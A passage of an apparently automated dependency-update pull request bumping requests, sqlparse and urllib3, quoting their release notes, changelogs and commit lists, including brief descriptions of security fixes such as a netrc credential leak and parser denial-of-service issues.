improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.1\u003c/h2\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.0\u003c/h2\u003e\n\u003cp\u003e2.32.0 (2024-05-20)\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.0 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/021dc729f0b71a3030cefdbec7fb57a0e80a6cfd\"\u003e\u003ccode\u003e021dc72\u003c/code\u003e\u003c/a\u003e Polish up release tooling for last manual release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/821770e822a20a21b207b3907ea83878bda1d396\"\u003e\u003ccode\u003e821770e\u003c/code\u003e\u003c/a\u003e Bump version and add release notes for v2.32.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/59f8aa2adf1d3d06bcbf7ce6b13743a1639a5401\"\u003e\u003ccode\u003e59f8aa2\u003c/code\u003e\u003c/a\u003e Add netrc file search information to authentication documentation (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6876\"\u003e#6876\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5b4b64c3467fd7a3c03f91ee641aaa348b6bed3b\"\u003e\u003ccode\u003e5b4b64c\u003c/code\u003e\u003c/a\u003e Add more tests to prevent regression of CVE 2024 47081\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7bc45877a86192af77645e156eb3744f95b47dae\"\u003e\u003ccode\u003e7bc4587\u003c/code\u003e\u003c/a\u003e Add new test to check netrc auth leak (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6962\"\u003e#6962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\"\u003e\u003ccode\u003e96ba401\u003c/code\u003e\u003c/a\u003e Only use hostname to do netrc lookup instead of netloc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7341690e842a23cf18ded0abd9229765fa88c4e2\"\u003e\u003ccode\u003e7341690\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/psf/requests/issues/6951\"\u003e#6951\u003c/a\u003e from tswast/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6716d7c9f29df636643fa2489f98890216525cb0\"\u003e\u003ccode\u003e6716d7c\u003c/code\u003e\u003c/a\u003e remove links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a7e1c745dc23c18e836febd672416ed0c5d8d8ae\"\u003e\u003ccode\u003ea7e1c74\u003c/code\u003e\u003c/a\u003e Update docs/conf.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/c799b8167a13416833ad3b4f3298261a477e826f\"\u003e\u003ccode\u003ec799b81\u003c/code\u003e\u003c/a\u003e docs: fix dead links to kenreitz.org\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.24.0...v2.32.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `sqlparse` from 0.3.1 to 0.5.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/andialbrecht/sqlparse/blob/master/CHANGELOG\"\u003esqlparse's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eRelease 0.5.0 (Apr 13, 2024)\u003c/h2\u003e\n\u003cp\u003eNotable Changes\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDrop support for Python 3.5, 3.6, and 3.7.\u003c/li\u003e\n\u003cli\u003ePython 3.12 is now supported (pr725, by hugovk).\u003c/li\u003e\n\u003cli\u003eIMPORTANT: Fixes a potential denial of service attack (DOS) due to recursion\nerror for deeply nested statements. Instead of recursion error a generic\nSQLParseError is raised. See the security advisory for details:\n\u003ca href=\"https://github.com/andialbrecht/sqlparse/security/advisories/GHSA-2m57-hf25-phgg\"\u003ehttps://github.com/andialbrecht/sqlparse/security/advisories/GHSA-2m57-hf25-phgg\u003c/a\u003e\nThe vulnerability was discovered by \u003ca href=\"https://github.com/uriyay-jfrog\"\u003e\u003ccode\u003e@​uriyay-jfrog\u003c/code\u003e\u003c/a\u003e. Thanks for reporting!\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eEnhancements\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSplitting statements now allows to remove the semicolon at the end.\nSome database backends love statements without semicolon (issue742).\u003c/li\u003e\n\u003cli\u003eSupport TypedLiterals in get_parameters (pr749, by Khrol).\u003c/li\u003e\n\u003cli\u003eImprove splitting of Transact SQL when using GO keyword (issue762).\u003c/li\u003e\n\u003cli\u003eSupport for some JSON operators (issue682).\u003c/li\u003e\n\u003cli\u003eImprove formatting of statements containing JSON operators (issue542).\u003c/li\u003e\n\u003cli\u003eSupport for BigQuery and Snowflake keywords (pr699, by griffatrasgo).\u003c/li\u003e\n\u003cli\u003eSupport parsing of OVER clause (issue701, pr768 by r33s3n6).\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eBug Fixes\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eIgnore dunder attributes when creating Tokens (issue672).\u003c/li\u003e\n\u003cli\u003eAllow operators to precede dollar-quoted strings (issue763).\u003c/li\u003e\n\u003cli\u003eFix parsing of nested order clauses (issue745, pr746 by john-bodley).\u003c/li\u003e\n\u003cli\u003eThread-safe initialization of Lexer class (issue730).\u003c/li\u003e\n\u003cli\u003eClassify TRUNCATE as DDL and GRANT/REVOKE as DCL keywords (based on pr719\nby josuc1, thanks for bringing this up!).\u003c/li\u003e\n\u003cli\u003eFix parsing of PRIMARY KEY (issue740).\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eOther\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eOptimize performance of matching function (pr799, by admachainz).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eRelease 0.4.4 (Apr 18, 2023)\u003c/h2\u003e\n\u003cp\u003eNotable Changes\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eIMPORTANT: This release fixes a security vulnerability in the\nparser where a regular expression vulnerable to ReDOS (Regular\nExpression Denial of Service) was used. See the security advisory\nfor details: \u003ca href=\"https://github.com/andialbrecht/sqlparse/security/advisories/GHSA-rrm6-wvj7-cwh2\"\u003ehttps://github.com/andialbrecht/sqlparse/security/advisories/GHSA-rrm6-wvj7-cwh2\u003c/a\u003e\nThe vulnerability was discovered by \u003ca href=\"https://github.com/erik-krogh\"\u003e\u003ccode\u003e@​erik-krogh\u003c/code\u003e\u003c/a\u003e from GitHub\nSecurity Lab (GHSL). Thanks for reporting!\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/andialbrecht/sqlparse/commit/ddbd0ec3592545c914fe71e47118c04582d8bfb0\"\u003e\u003ccode\u003eddbd0ec\u003c/code\u003e\u003c/a\u003e Bump version.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/andialbrecht/sqlparse/commit/29f2e0a6609ddc1fa248faef1bc41616043c544e\"\u003e\u003ccode\u003e29f2e0a\u003c/code\u003e\u003c/a\u003e Raise recursion limit for tests.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/andialbrecht/sqlparse/commit/b4a39d9850969b4e1d6940d32094ee0b42a2cf03\"\u003e\u003ccode\u003eb4a39d9\u003c/code\u003e\u003c/a\u003e Raise SQLParseError instead of RecursionError.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/andialbrecht/sqlparse/commit/f1bcf2f8a7ddf6854c99990c56ff5394f4981d58\"\u003e\u003ccode\u003ef1bcf2f\u003c/code\u003e\u003c/a\u003e Update AUHTORS and Changelog.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/andialbrecht/sqlparse/commit/e03b74e608b71dd06824c2cb42421c0d790248e3\"\u003e\u003ccode\u003ee03b74e\u003c/code\u003e\u003c/a\u003e Fix Function.get_parameters(), add Funtion.get_window()\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/andialbrecht/sqlparse/commit/617b8f6cd3c55bacf2c80130901508518753f7e1\"\u003e\u003ccode\u003e617b8f6\u003c/code\u003e\u003c/a\u003e Add OVER clause, and group it into Function (fixes \u003ca href=\"https://redirect.github.com/andialbrecht/sqlparse/issues/701\"\u003e#701\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/andialbrecht/sqlparse/commit/d8f81471cfc2c39ac43128e2a0c8cc67c313cc40\"\u003e\u003ccode\u003ed8f8147\u003c/code\u003e\u003c/a\u003e Update AUHTORS and Changelog.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/andialbrecht/sqlparse/commit/012c9f10c8ddfa47ccf17ead28122492155cf6fc\"\u003e\u003ccode\u003e012c9f1\u003c/code\u003e\u003c/a\u003e Optimize sqlparse.utils.imt().\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/andialbrecht/sqlparse/commit/46971e5a804b29e7dbd437155a8ceffab8ef1cd5\"\u003e\u003ccode\u003e46971e5\u003c/code\u003e\u003c/a\u003e Fix parsing of PRIMARY KEY (fixes \u003ca href=\"https://redirect.github.com/andialbrecht/sqlparse/issues/740\"\u003e#740\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/andialbrecht/sqlparse/commit/fc4b0beab89c5598d556572cb6db0165affb017b\"\u003e\u003ccode\u003efc4b0be\u003c/code\u003e\u003c/a\u003e Code cleanup.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/andialbrecht/sqlparse/compare/0.3.1...0.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `urllib3` from 1.26.5 to 2.5.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/releases\"\u003eurllib3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.5.0\u003c/h2\u003e\n\u003ch2\u003e🚀 urllib3 is fundraising for HTTP/2 support\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support\"\u003eurllib3 is raising ~$40,000 USD\u003c/a\u003e to release HTTP/2 support and ensure long-term sustainable maintenance of the project after a sharp decline in financial support. If your company or organization uses Python and would benefit from HTTP/2 support in Requests, pip, cloud SDKs, and thousands of other projects \u003ca href=\"https://opencollective.com/urllib3\"\u003eplease consider contributing financially\u003c/a\u003e to ensure HTTP/2 support is developed sustainably and maintained for the long-haul.\u003c/p\u003e\n\u003cp\u003eThank you for your support.\u003c/p\u003e\n\u003ch1\u003eSecurity issues\u003c/h1\u003e\n\u003cp\u003eurllib3 2.5.0 fixes two moderate security issues:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ePool managers now properly control redirects when \u003ccode\u003eretries\u003c/code\u003e is passed — CVE-2025-50181 reported by \u003ca href=\"https://github.com/sandumjacob\"\u003e\u003ccode\u003e@​sandumjacob\u003c/code\u003e\u003c/a\u003e (5.3 Medium, GHSA-pq67-6m6q-mj2v)\u003c/li\u003e\n\u003cli\u003eRedirects are now controlled by urllib3 in the Node.js runtime — CVE-2025-50182 (5.3 Medium, GHSA-48p4-8xcf-vxj5)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eFeatures\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for the \u003ccode\u003ecompression.zstd\u003c/code\u003e module that is new in Python 3.14. See \u003ca href=\"https://peps.python.org/pep-0784/\"\u003ePEP 784\u003c/a\u003e for more information. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3610\"\u003e#3610\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdded support for version 0.5 of \u003ccode\u003ehatch-vcs\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3612\"\u003e#3612\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eRaised exception for \u003ccode\u003eHTTPResponse.shutdown\u003c/code\u003e on a connection already released to the pool. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3581\"\u003e#3581\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed incorrect \u003ccode\u003eCONNECT\u003c/code\u003e statement when using an IPv6 proxy with \u003ccode\u003econnection_from_host\u003c/code\u003e. Previously would not be wrapped in \u003ccode\u003e[]\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3615\"\u003e#3615\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.4.0\u003c/h2\u003e\n\u003ch2\u003e🚀 urllib3 is fundraising for HTTP/2 support\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support\"\u003eurllib3 is raising ~$40,000 USD\u003c/a\u003e to release HTTP/2 support and ensure long-term sustainable maintenance of the project after a sharp decline in financial support. If your company or organization uses Python and would benefit from HTTP/2 support in Requests, pip, cloud SDKs, and thousands of other projects \u003ca href=\"https://opencollective.com/urllib3\"\u003eplease consider contributing financially\u003c/a\u003e to ensure HTTP/2 support is developed sustainably and maintained for the long-haul.\u003c/p\u003e\n\u003cp\u003eThank you for your support.\u003c/p\u003e\n\u003ch1\u003eFeatures\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eApplied PEP 639 by specifying the license fields in pyproject.toml. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3522\"\u003e#3522\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdated exceptions to save and restore more properties during the pickle/serialization process. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3567\"\u003e#3567\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003everify_flags\u003c/code\u003e option to \u003ccode\u003ecreate_urllib3_context\u003c/code\u003e with a default of \u003ccode\u003eVERIFY_X509_PARTIAL_CHAIN\u003c/code\u003e and \u003ccode\u003eVERIFY_X509_STRICT\u003c/code\u003e for Python 3.13+. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3571\"\u003e#3571\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug with partial reads of streaming data in Emscripten. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3555\"\u003e#3555\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eMisc\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSwitched to uv for installing development dependecies. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3550\"\u003e#3550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003emultiple.intoto.jsonl\u003c/code\u003e asset from GitHub releases. Attestation of release files since v2.3.0 can be found on PyPI. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3566\"\u003e#3566\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.3.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/blob/main/CHANGES.rst\"\u003eurllib3's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e2.5.0 (2025-06-18)\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for the \u003ccode\u003ecompression.zstd\u003c/code\u003e module that is new in Python 3.14.\nSee \u003ccode\u003ePEP 784 \u0026lt;https://peps.python.org/pep-0784/\u0026gt;\u003c/code\u003e_ for more information. (\u003ccode\u003e[#3610](https://github.com/urllib3/urllib3/issues/3610) \u0026lt;https://github.com/urllib3/urllib3/issues/3610\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eAdded support for version 0.5 of \u003ccode\u003ehatch-vcs\u003c/code\u003e (\u003ccode\u003e[#3612](https://github.com/urllib3/urllib3/issues/3612) \u0026lt;https://github.com/urllib3/urllib3/issues/3612\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a security issue where restricting the maximum number of followed\nredirects at the \u003ccode\u003eurllib3.PoolManager\u003c/code\u003e level via the \u003ccode\u003eretries\u003c/code\u003e parameter\ndid not work.\u003c/li\u003e\n\u003cli\u003eMade the Node.js runtime respect redirect parameters such as \u003ccode\u003eretries\u003c/code\u003e\nand \u003ccode\u003eredirects\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eRaised exception for \u003ccode\u003eHTTPResponse.shutdown\u003c/code\u003e on a connection already released to the pool. (\u003ccode\u003e[#3581](https://github.com/urllib3/urllib3/issues/3581) \u0026lt;https://github.com/urllib3/urllib3/issues/3581\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eFixed incorrect \u003ccode\u003eCONNECT\u003c/code\u003e statement when using an IPv6 proxy with \u003ccode\u003econnection_from_host\u003c/code\u003e. Previously would not be wrapped in \u003ccode\u003e[]\u003c/code\u003e. (\u003ccode\u003e[#3615](https://github.com/urllib3/urllib3/issues/3615) \u0026lt;https://github.com/urllib3/urllib3/issues/3615\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e2.4.0 (2025-04-10)\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApplied PEP 639 by specifying the license fields in pyproject.toml. (\u003ccode\u003e[#3522](https://github.com/urllib3/urllib3/issues/3522) \u0026lt;https://github.com/urllib3/urllib3/issues/3522\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eUpdated exceptions to save and restore more properties during the pickle/serialization process. (\u003ccode\u003e[#3567](https://github.com/urllib3/urllib3/issues/3567) \u0026lt;https://github.com/urllib3/urllib3/issues/3567\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003everify_flags\u003c/code\u003e option to \u003ccode\u003ecreate_urllib3_context\u003c/code\u003e with a default of \u003ccode\u003eVERIFY_X509_PARTIAL_CHAIN\u003c/code\u003e and \u003ccode\u003eVERIFY_X509_STRICT\u003c/code\u003e for Python 3.13+. (\u003ccode\u003e[#3571](https://github.com/urllib3/urllib3/issues/3571) \u0026lt;https://github.com/urllib3/urllib3/issues/3571\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug with partial reads of streaming data in Emscripten. (\u003ccode\u003e[#3555](https://github.com/urllib3/urllib3/issues/3555) \u0026lt;https://github.com/urllib3/urllib3/issues/3555\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eMisc\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSwitched to uv for installing development dependecies. (\u003ccode\u003e[#3550](https://github.com/urllib3/urllib3/issues/3550) \u0026lt;https://github.com/urllib3/urllib3/issues/3550\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003emultiple.intoto.jsonl\u003c/code\u003e asset from GitHub releases. Attestation of release files since v2.3.0 can be found on PyPI. (\u003ccode\u003e[#3566](https://github.com/urllib3/urllib3/issues/3566) \u0026lt;https://github.com/urllib3/urllib3/issues/3566\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e2.3.0 (2024-12-22)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/aaab4eccc10c965897540b21e15f11859d0b62e7\"\u003e\u003ccode\u003eaaab4ec\u003c/code\u003e\u003c/a\u003e Release 2.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/7eb4a2aafe49a279c29b6d1f0ed0f42e9736194f\"\u003e\u003ccode\u003e7eb4a2a\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/f05b1329126d5be6de501f9d1e3e36738bc08857\"\u003e\u003ccode\u003ef05b132\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/d03fe327a71d09728512217149f269763671f296\"\u003e\u003ccode\u003ed03fe32\u003c/code\u003e\u003c/a\u003e Fix HTTP tunneling with IPv6 in older Python versions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/11661e9bb4278e43d081f47a516e287a928c2206\"\u003e\u003ccode\u003e11661e9\u003c/code\u003e\u003c/a\u003e Bump github/codeql-action from 3.28.0 to 3.29.0 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3624\"\u003e#3624\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/6a0ecc6b16fe30f721021b44a81d19615098c71e\"\u003e\u003ccode\u003e6a0ecc6\u003c/code\u003e\u003c/a\u003e Update v2 migration guide to 2.4.0 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3621\"\u003e#3621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/8e32e60d9024c05bc6f7adda08bdf6c539d0b0d4\"\u003e\u003ccode\u003e8e32e60\u003c/code\u003e\u003c/a\u003e Raise exception for shutdown on a connection already released to the pool (\u003ca 